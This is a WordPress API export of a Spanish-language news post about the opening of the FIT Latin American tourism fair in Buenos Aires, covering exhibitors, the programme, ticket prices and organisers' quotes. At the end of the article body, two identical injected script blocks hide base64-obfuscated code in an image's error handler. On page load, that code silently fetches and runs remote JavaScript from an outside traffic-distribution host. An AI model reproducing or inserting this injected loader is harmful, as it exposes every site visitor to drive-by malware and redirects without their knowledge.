{"id":1571,"date":"2022-10-02T15:49:05","date_gmt":"2022-10-02T18:49:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1571"},"modified":"2025-08-14T00:33:58","modified_gmt":"2025-08-14T03:33:58","slug":"fit-la-mayor-feria-de-turismo-de-america-latina-comenzo-en-la-ciudad-de-buenos-aires","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1571","title":{"rendered":"FIT la mayor feria de turismo de Am\u00e9rica Latina comenz\u00f3 en la Ciudad de Buenos Aires"},"content":{"rendered":"\n<h3 class=\"has-text-color has-background wp-block-heading\" style=\"background-color:#07cce3;color:#48494a\"><strong><em>El presidente de la Feria Internacional, Gustavo Hani, manifest\u00f3 a T\u00e9lam Radio que \u00abla FIT es hoy por hoy la tercera feria (de turismo) m\u00e1s grande del mundo; es donde est\u00e1 todo el sector tur\u00edstico del mundo\u00bb.<\/em><\/strong><\/h3>\n\n\n\n<p>La Feria Internacional de Turismo de Am\u00e9rica Latina (FIT-AL), el mayor encuentro del sector en la regi\u00f3n y uno de los tres m\u00e1s importantes del mundo, comenzar\u00e1 este s\u00e1bado en el predio de La Rural del barrio porte\u00f1o de Palermo y continuar\u00e1 hasta el martes con la participaci\u00f3n de las 23 provincias argentinas, la ciudad anfitriona, 52 pa\u00edses y la expectativa de un r\u00e9cord de 100.000 visitantes.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/asicotur.com\/\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2021\/09\/202109-ASICOTUR-banner.gif\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p><strong>Durante el s\u00e1bado y el domingo&nbsp;<\/strong>la Feria estar\u00e1 abierta de 14 a 21 para el p\u00fablico en general y cada destino mostrar\u00e1 a los visitantes sus atractivos y propuestas de actividades, adem\u00e1s de brindarles espect\u00e1culos, entretenimientos participativos, degustaciones y sorteos sin cargo.<\/p>\n\n\n\n<p>Las&nbsp;<strong>agencias de viajes y operadores tur\u00edsticos<\/strong>&nbsp;les ofrecer\u00e1n promociones para viajar por el pa\u00eds, alojamiento, gastronom\u00eda, excursiones, alquiler de autos y diversas actividades en los destinos a precios especiales.<\/p>\n\n\n\n<p><strong>Lunes y martes<\/strong>&nbsp;ser\u00e1n d\u00edas de actividades s\u00f3lo oficiales y profesionales -de 10 a 19-, para desarrollar opciones de comercializaci\u00f3n con las cl\u00e1sicas Rondas de Negocios FIT -en un pabell\u00f3n especial y con nuevo formato para optimizar tiempos, confort y resultados- en las que se ofrecer\u00e1n oportunidades de crecimiento e intercambio para todos los actores del sector.<\/p>\n\n\n\n<p>En ese marco, habr\u00e1 numerosos encuentros programados entre operadores receptivos locales y emisores del exterior, para atraer visitantes internacionales y vender paquetes tur\u00edsticos.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-soundcloud wp-block-embed-soundcloud\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"La Feria Internacional de Turismo en La Rural espera superar los 100 mil visitantes by Audio\" width=\"696\" height=\"400\" scrolling=\"no\" frameborder=\"no\" src=\"https:\/\/w.soundcloud.com\/player\/?visual=true&#038;url=https%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F1354279930&#038;show_artwork=true&#038;maxheight=1000&#038;maxwidth=696\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">SOBRE LA FIT<\/h2>\n\n\n\n<p>La FIT es organizada por la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo (Faevyt) y la Asociaci\u00f3n de Agencias de Viajes y Turismo de Buenos Aires, con la realizaci\u00f3n integral de Ferias Argentinas y el auspicio del Ministerio de Turismo y Deportes (Minturdep).<\/p>\n\n\n\n<p>La edici\u00f3n 2021 se realiz\u00f3 en diciembre a causa de la pandemia de coronavirus, para incluir m\u00e1s actividades al aire libre en el clima ya veraniego y as\u00ed reducir los aforos internos, y recibi\u00f3 unas 73.000 personas, pero este a\u00f1o las condiciones sanitarias permitieron que vuelva a su fecha tradicional de inicios de primavera.<\/p>\n\n\n\n<p>El&nbsp;<strong>Minturdep&nbsp;<\/strong>tendr\u00e1 en esta edici\u00f3n dos stands -uno ser\u00e1 institucional y el otro promocional- y un espacio dedicado a las Fiestas Nacionales.<\/p>\n\n\n\n<p>El stand institucional contar\u00e1 con un auditorio para actividades referidas a iniciativas como el plan PreViaje, La Ruta Natural, Marca Pa\u00eds, Fiestas Argentinas, Experiencias Argentinas, Promover Turismo Federal y Sostenible, Activar+ y el Camino de los Jesuitas.<\/p>\n\n\n\n<p>En el mismo espacio habr\u00e1 exposiciones sobre las pol\u00edticas llevadas adelante en materia de Turismo Social, Calidad Tur\u00edstica, Formaci\u00f3n y Agencias de Viajes y se presentar\u00e1 una plataforma sobre inversiones tur\u00edsticas.<\/p>\n\n\n\n<p>En el stand promocional se realizar\u00e1n acciones como una degustaci\u00f3n con la consigna \u201cArgentina, tierra de vinos\u201d y la entrega de la Marca Pa\u00eds al Tren del Fin del Mundo y a la Estaci\u00f3n Fluvial de Rosario.<\/p>\n\n\n\n<p>En el espacio dedicado a&nbsp;<strong>Fiestas Argentinas&nbsp;<\/strong>se presentar\u00e1n atractivos espect\u00e1culos representativos de celebraciones tradicionales de todo el pa\u00eds.<\/p>\n\n\n\n<p>Tambi\u00e9n tendr\u00e1n sus espacios en la FIT organismos federales y regionales, como el Consejo Federal de Turismo y el Ente de Turismo Patagonia Argentina, adem\u00e1s de entidades corporativas del sector privado, como la C\u00e1mara Argentina de Turismo (CAT), la Federaci\u00f3n Empresaria Hotelero Gastron\u00f3mica de la Rep\u00fablica Argentina y la Confederaci\u00f3n Argentina de la Mediana Empresa, que cuenta con un \u00e1rea espec\u00edfica de Turismo.<\/p>\n\n\n\n<p>La&nbsp;<strong>tecnolog\u00eda&nbsp;<\/strong>estar\u00e1 presente con FIT-Tech, un espacio creado en las \u00faltimas ediciones en donde confluyen las nuevas tendencias y las herramientas para el crecimiento de la industria, y en el que se brindar\u00e1n conferencias con invitados de todo el mundo sobre Innovaci\u00f3n, Tecnolog\u00eda, Hospitalidad y problem\u00e1ticas globales del turismo.<\/p>\n\n\n\n<p>El presidente de la FIT, Gustavo Hani, manifest\u00f3 a T\u00e9lam Radio que \u201cla FIT es hoy por hoy la tercera feria (de turismo) m\u00e1s grande del mundo; es donde est\u00e1 todo el sector tur\u00edstico del mundo\u201d.<\/p>\n\n\n\n<p>El tambi\u00e9n presidente de la CAT y la Faevyt dijo que con \u201ctodas las provincias, 52 pa\u00edses presentes, muchos municipios, va a ser una gran feria, superamos todos los metros expositivos, estamos al 100%, as\u00ed que la gente vaya a visitarla porque se va a encontrar con todo el folclore, la m\u00fasica, la gastronom\u00eda, las promociones tur\u00edsticas, paquetes con descuentos y dem\u00e1s para toda la Argentina y el mundo\u201d.<\/p>\n\n\n\n<p><strong>\u201cTodas las provincias, todos los operadores tur\u00edsticos hacen una apuesta incre\u00edble, lo mismo que los pa\u00edses, toda la gastronom\u00eda del mundo\u201d<\/strong>, enfatiz\u00f3 Hani, quien ya hab\u00eda manifestado que este a\u00f1o<strong>&nbsp;\u201cel desaf\u00edo es estar por arriba de los 100.000 visitantes\u201d.<\/strong><\/p>\n\n\n\n<p>Desde la cartera de Turismo, la secretaria de Promoci\u00f3n Tur\u00edstica,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>, afirm\u00f3 que \u201cla FIT es el lugar de encuentro de todos los actores de la actividad y una muestra cabal de la potencia del trabajo mancomunado entre los sectores p\u00fablico y privado\u201d.<\/p>\n\n\n\n<p><strong>\u201cApostamos a que esta nueva edici\u00f3n sea, una vez m\u00e1s, escenario de acciones, negocios y propuestas para seguir potenciando el turismo y avanzando en la senda de crecimiento\u201d<\/strong>, a\u00f1adi\u00f3 la funcionaria.<\/p>\n\n\n\n<p><a href=\"https:\/\/fit.org.ar\/entradas\/\" target=\"_blank\" rel=\"noreferrer noopener\">La entrada a la Feria se puede comprar online<\/a>&nbsp;hasta este viernes, con descuento, o desde este s\u00e1bado en la boleter\u00eda de La Rural.<\/p>\n\n\n\n<p>El precio general en boleter\u00eda es de $800 pesos y para estudiantes de turismo y jubilados $600, en tanto la compra online es un 25% m\u00e1s barata, y en ambos casos los menores de 10 a\u00f1os acompa\u00f1ados por adultos y las personas con certificado de discapacidad entran sin cargo.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202209\/606473-feria-turismo-america-latina-ciudad-buenos-aires.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-10193\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El presidente de la Feria Internacional, Gustavo Hani, manifest\u00f3 a T\u00e9lam Radio que \u00abla FIT es hoy por hoy la tercera feria (de turismo) m\u00e1s grande del mundo; es donde est\u00e1 todo el sector tur\u00edstico del mundo\u00bb. La Feria Internacional de Turismo de Am\u00e9rica Latina (FIT-AL), el mayor encuentro del sector en la regi\u00f3n y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1572,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-1571","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1571"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1571"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1571\/revisions"}],"predecessor-version":[{"id":7329,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1571\/revisions\/7329"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1572"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1571"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1571"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1571"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}